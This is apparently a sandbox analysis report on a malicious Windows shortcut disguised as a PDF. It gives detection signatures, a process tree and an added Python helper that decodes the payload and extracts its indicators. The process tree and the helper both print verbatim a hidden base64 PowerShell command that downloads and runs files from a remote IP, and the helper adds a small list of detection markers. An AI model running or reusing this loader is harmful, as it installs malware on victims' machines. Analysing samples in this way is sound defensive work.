Windows Analysis Report
Integration.pdf www.skype.com.lnk
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
96 | 0 - 100 | false | 100%
Signatures
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- cmd.exe (PID: 3984 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0FwcGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMjQzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVByb2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZXF1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBwZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXGtnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K')) | Invoke-Expression" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3456 cmdline: powershell -WindowStyle Hidden -Command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0FwcGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMjQzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVByb2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZXF1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBwZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklPLkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXGtnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRvSXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K')) | Invoke-Expression" MD5: 04029E121A0CFA5991749937DD22A1D9)
- Acrobat.exe (PID: 4024 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Roaming\vmapi.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
- AcroCEF.exe (PID: 4808 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- AcroCEF.exe (PID: 7204 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2076 --field-trial-handle=1636,i,14726364720593086116,8068098665714155558,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
- svchost.exe (PID: 3160 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
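The stage that cmd.exe (PID 3984) hands to PowerShell is not an `-EncodedCommand` blob (which would be UTF-16LE) but a base64 literal that the sample itself decodes with `UTF8.GetString` and pipes into `Invoke-Expression`. Decoded, it is a short script that fetches `vmapi.pdf` from 2.58.56.243 into %APPDATA% and opens it as a decoy (which is why Acrobat.exe appears in the tree with that path), fetches `kghtyed.zip` from the same host, extracts it into %APPDATA%, and runs `AutoIt3.exe` with `script.a3x`. The following triage helper is an added example, not part of the sandbox report: it takes the recorded command line, recovers the script the same way the sample does, and lists the network and file indicators it contains. The command line and base64 literal are copied from the report; the function names and the marker list are this example's own.

```python
"""Added triage example (not part of the sandbox report): recover the
PowerShell stage launched by the LNK from the cmd.exe command line in the
process tree (PID 3984) and pull out its indicators.  The command line is
copied from the report; helper names and the marker list are this example's."""
import base64
import re
from urllib.parse import urlparse

# Base64 literal exactly as it appears in the recorded command line.
STAGE1_B64 = (
    "JGFwcGRhdGE9W1N5c3RlbS5FbnZpcm9ubWVudF06OkdldEZvbGRlclBhdGgoJ0Fw"
    "cGxpY2F0aW9uRGF0YScpDQpJbnZva2UtV2ViUmVxdWVzdCAnaHR0cDovLzIuNTguNTYuMj"
    "QzL3ZtYXBpLnBkZicgLU91dEZpbGUgIiRhcHBkYXRhXHZtYXBpLnBkZiI7IFN0YXJ0LVBy"
    "b2Nlc3MgIiRhcHBkYXRhXHZtYXBpLnBkZiINCiMgUE9SVFVHQUwNCkludm9rZS1XZWJSZX"
    "F1ZXN0ICdodHRwOi8vMi41OC41Ni4yNDMva2dodHllZC56aXAnIC1PdXRGaWxlICIkYXBw"
    "ZGF0YVxrZ2h0eWVkLnppcCINCiMgUE9SVFVHQUwgRlJBTkNFDQpBZGQtVHlwZSAtQXNzZW"
    "1ibHlOYW1lIFN5c3RlbS5JTy5Db21wcmVzc2lvbi5GaWxlU3lzdGVtDQpbU3lzdGVtLklP"
    "LkNvbXByZXNzaW9uLlppcEZpbGVdOjpFeHRyYWN0VG9EaXJlY3RvcnkoIiRhcHBkYXRhXG"
    "tnaHR5ZWQuemlwIiwgJGFwcGRhdGEpDQpTdGFydC1Qcm9jZXNzICIkYXBwZGF0YVxBdXRv"
    "SXQzLmV4ZSIgIiRhcHBkYXRhXHNjcmlwdC5hM3giDQojIFBPUlRVR0FMIEJSQUJVUw0K"
)

# The full cmd.exe command line from the process tree (PID 3984).
STAGE1_CMDLINE = (
    r'"C:\Windows\System32\cmd.exe" /c powershell -WindowStyle Hidden -Command '
    r'"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('
    + "'" + STAGE1_B64 + "'"
    + r')) | Invoke-Expression"'
)

B64_LITERAL = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")

# Substrings worth flagging in any PowerShell command line.  This list is the
# example's own, chosen from what the report's Sigma and command-line
# signatures describe; it is not the rules' actual detection logic.
SUSPICIOUS_MARKERS = ("FromBase64String", "Invoke-Expression", "-WindowStyle Hidden")


def cmdline_markers(cmdline: str) -> list:
    """Return the suspicious markers present in a command line (case-insensitive)."""
    low = cmdline.lower()
    return [m for m in SUSPICIOUS_MARKERS if m.lower() in low]


def decode_stage(cmdline: str) -> str:
    """Recover the script hidden in a FromBase64String('...') literal.

    The sample wraps the bytes in UTF8.GetString, so they are plain base64 of
    UTF-8 text.  A powershell -EncodedCommand payload is UTF-16LE instead;
    decoding that as UTF-8 would give NUL-separated characters.
    """
    m = B64_LITERAL.search(cmdline)
    if m is None:
        raise ValueError("no FromBase64String('...') literal in command line")
    raw = base64.b64decode(m.group(1), validate=True)
    return raw.decode("utf-8")


def extract_iocs(script: str) -> dict:
    """Pull URLs, hosts, dropped files, launched files and the attacker's own
    comment lines (campaign tags) out of the decoded PowerShell stage."""
    urls = re.findall(r"https?://[^\s'\"]+", script)
    lines = script.splitlines()
    return {
        "urls": urls,
        "hosts": sorted({urlparse(u).hostname for u in urls}),
        "dropped": re.findall(r'-OutFile\s+"([^"]+)"', script),
        "launched": re.findall(r'Start-Process\s+"([^"]+)"', script),
        "comments": [ln[1:].strip() for ln in lines if ln.startswith("#")],
    }


if __name__ == "__main__":
    print("markers:", cmdline_markers(STAGE1_CMDLINE))
    stage = decode_stage(STAGE1_CMDLINE)
    print(stage)
    for key, value in extract_iocs(stage).items():
        print(f"{key}: {value}")
```

Running it prints the nine-line script and the indicator lists; the `launched` list shows both the decoy (`$appdata\vmapi.pdf`) and the real payload (`$appdata\AutoIt3.exe`), which is the detail the hash-only view of the process tree hides. The same `decode_stage` call works on the powershell.exe line (PID 3456), since it carries the identical literal.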
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | 
System Summary
Source: | Author: Florian Roth (Nextron Systems)